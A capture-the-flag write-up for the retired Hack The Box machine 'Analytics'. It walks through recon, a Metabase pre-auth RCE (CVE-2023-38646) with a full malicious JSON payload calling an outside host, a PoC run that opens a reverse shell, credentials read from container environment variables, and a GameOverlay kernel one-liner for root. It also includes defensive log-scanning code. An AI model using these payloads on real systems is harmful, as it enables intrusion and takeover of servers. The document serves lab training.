Analytics

Date: 24 March 2024

NOTE:

This writeup meets HTB's ToS as this solution is published after the machine is retired (or expired). This means that following this writeup won't count towards the seasonal points.

Summary

Analytics is an easy difficulty Linux machine with exposed HTTP and SSH services. Enumeration of the website reveals a Metabase instance that is vulnerable to Pre-Authentication Remote Code Execution (CVE-2023-38646), which is leveraged to gain a foothold inside a Docker container. Enumerating the Docker container shows that its environment variables contain credentials that can be used to SSH into the host. Post-exploitation enumeration reveals that the kernel version running on the host is vulnerable to GameOverlay, which is leveraged to obtain root privileges.

Recon:

Begin by running a basic Nmap port scan:

sudo nmap -T3 10.10.11.233
...
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
...

After attempting to load http://10.10.11.233, notice that it tried to resolve analytical.htb, so add this to the /etc/hosts file:

echo "10.10.11.233 analytical.htb" | sudo tee -a /etc/hosts

Next, fuzz for subdomains:

ffuf -u http://10.10.11.233 -H "Host: FUZZ.analytical.htb" -w subdomains-top1million-20000.txt
...
data [Status: 200, Size: 77883, Words: 3574, Lines: 28, Duration: 186ms]
...

I also added this to my /etc/hosts file:

echo "10.10.11.233 data.analytical.htb" | sudo tee -a /etc/hosts

You can continue enumerating by directory fuzzing, although by exploring the site you can find a login link to data.analytical.htb/auth/login. This leads to a login page.

A quick Google search for metabase exploit leads to the article Chaining our way to Pre-Auth RCE in Metabase (CVE-2023-38646).

Weaponisation:

Essentially, Shubham and their team found that a setup-token is generated as part of the setup process and should be wiped post-installation. However, it was not wiped, and any unauthenticated user can access the value of the token either by:

  1. Viewing the embedded JSON object in source code under (in this case) data.analytical.htb/auth/login.
  2. Viewing the token under /api/session/properties.

With this token, a POST request can be made to /api/setup/validate with a malicious database connection string that allows for the execution of arbitrary commands via SQLi, which leads to RCE.

First, obtain the setup-token:

curl data.analytical.htb/api/session/properties -s | jq -r '."setup-token"' 
249fa03d-fd94-4d5b-b94f-b4ebf3df681f

Then modify the payload created by Shubham and their team to exploit:

POST /api/setup/validate HTTP/1.1
Host: localhost
Content-Type: application/json
Content-Length: 566

{
"token": "249fa03d-fd94-4d5b-b94f-b4ebf3df681f",
"details":
{
"is_on_demand": false,
"is_full_sync": false,
"is_sample": false,
"cache_ttl": null,
"refingerprint": false,
"auto_run_queries": true,
"schedules":
{},
"details":
{
"db": "zip:/app/metabase.jar!/sample-database.db;MODE=MSSQLServer;TRACE_LEVEL_SYSTEM_OUT=1\\;CREATE TRIGGER IAMPWNED BEFORE SELECT ON INFORMATION_SCHEMA.TABLES AS $$//javascript\nnew java.net.URL('https://example.com/pwn134').openConnection().getContentLength()\n$$--=x\\;",
"advanced-options": false,
"ssl": true
},
"name": "an-sec-research-team",
"engine": "h2"
}
}

I created a PoC for this which automatically retrieves the setup-token and exploits the vulnerability to achieve RCE:

# Setup listener
nc -lnvp 9001

# Exploit CVE-2023-38646
python3 CVE-2023-38646.py --lhost {KALI_IP} --lport {KALI_LISTENING_PORT} --url http://{DOMAIN_OF_LOGIN_PAGE}

# Example:
python3 CVE-2023-38646.py --lhost 10.10.14.30 --lport 9001 --url http://data.analytical.htb
CVE-2023-38646.py
Looking for token...
Found! Setup Token: 249fa03d-fd94-4d5b-b94f-b4ebf3df681f

Executing with URL: http://data.analytical.htb/api/setup/validate
... please wait

POST request made!
Make sure you have set up a listening port on your local machine to test effectiveness
nc listener
listening on [any] 9001 ...
connect to [10.10.14.30] from (UNKOWN) [10.10.11.223] 35206
...
NOTE:

You can download my CVE-2023-38646 PoC on GitHub.

Metasploit also has the module exploit/linux/http/metabase_setup_token_rce which can be used instead.
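As an added, defensive example that is not part of this writeup or of the PoC: the Python below takes the JSON body of /api/session/properties and reports whether a setup-token is still exposed to unauthenticated clients (the precondition for this chain), and scans reverse-proxy access log lines for the request pattern the chain produces. The log lines, IPs and the combined log format are constructed assumptions.

```python
"""Defensive checks for the CVE-2023-38646 precondition and request pattern.

1. exposed_setup_token(): given the body of /api/session/properties fetched
   without a session, return the leaked setup-token (or None if fixed).
2. scan_access_log() / chained_sources(): flag clients that probed the
   properties endpoint and then hit /api/setup/validate.
"""
import json
import re
from typing import List, Optional, Set, Tuple

# Constructed sample body, not a real Metabase capture.
SAMPLE_PROPERTIES = (
    '{"version": {"tag": "v0.46.6"}, "site-name": "Demo", '
    '"setup-token": "00000000-0000-4000-8000-000000000000"}'
)

# Constructed combined-log-format lines from an assumed reverse proxy.
SAMPLE_LOG = [
    '203.0.113.5 - - [24/Mar/2024:10:00:01 +0000] "GET /api/session/properties HTTP/1.1" 200 77883 "-" "curl/8.4.0"',
    '198.51.100.7 - - [24/Mar/2024:10:00:02 +0000] "GET /auth/login HTTP/1.1" 200 4101 "-" "Mozilla/5.0"',
    '203.0.113.5 - - [24/Mar/2024:10:00:05 +0000] "POST /api/setup/validate HTTP/1.1" 400 156 "-" "python-requests/2.31"',
]

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3})'
)

# Endpoints the chain touches; after setup is complete neither should be hit.
SUSPICIOUS = {
    ("GET", "/api/session/properties"): "setup-token disclosure probe",
    ("POST", "/api/setup/validate"): "setup validate request after install",
}


def exposed_setup_token(body: str) -> Optional[str]:
    """Return the setup-token if the unauthenticated endpoint still leaks it."""
    try:
        props = json.loads(body)
    except json.JSONDecodeError:
        return None
    token = props.get("setup-token")
    return token if isinstance(token, str) and token else None


def scan_access_log(lines: List[str]) -> List[Tuple[str, str, str, str, str]]:
    """Return (ip, method, path, status, reason) for each suspicious request."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # skip lines that do not parse as combined log format
        key = (m["method"], m["path"].split("?", 1)[0])
        if key in SUSPICIOUS:
            hits.append((m["ip"], key[0], key[1], m["status"], SUSPICIOUS[key]))
    return hits


def chained_sources(hits) -> Set[str]:
    """IPs that both probed the properties endpoint and posted to validate."""
    probed = {h[0] for h in hits if h[2] == "/api/session/properties"}
    posted = {h[0] for h in hits if h[2] == "/api/setup/validate"}
    return probed & posted
```

A non-empty result from exposed_setup_token on a production instance means the install should be patched to a fixed Metabase release; a non-empty chained_sources set is worth an incident ticket.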

With RCE, we can then begin system enumeration.

Enumeration

Running ls -a reveals a .dockerenv file, which indicates we are inside a container:

ls -a
.
..
.dockerenv
...

But by executing env to show the environment variables, we find:

env
...
META_USER=metalytics
META_PASS={REDACTED}
...

Using this login, we can SSH into the host machine and retrieve the flag:

ssh metalytics@analytical.htb
# password: {PASSWORD REDACTED}

cat user.txt
{USER FLAG REDACTED}

Privilege Escalation:

We can enumerate the kernel version:

uname -a
Linux analytics 6.2.0-25-generic #25~22.04.2-Ubuntu SMP PREEMPT_DYNAMIC...

And then search online for 6.2.0-25-generic #25~22.04.2-Ubuntu CVE. This leads to finding a vulnerability called GameOverlay. There is also a payload shared on X for this exploit.

The payload shared on X by Liad Eliyahu can be modified as per the below to obtain a shell that is escalated to root:

unshare -rm sh -c "mkdir l u w m && cp /u*/b*/p*3 l/; setcap cap_setuid+eip l/python3;mount -t overlay overlay -o rw,lowerdir=l,upperdir=u,workdir=w m && touch m/*;" && u/python3 -c 'import os;os.setuid(0);os.system("rm -rf l m u w; bash")'

Then read the root flag:

cat root.txt

UPDATE:

This is a dense payload but 0xRave breaks down the command very well in their article. If you prefer a video format, take a look at 0xdf's explanation on YouTube.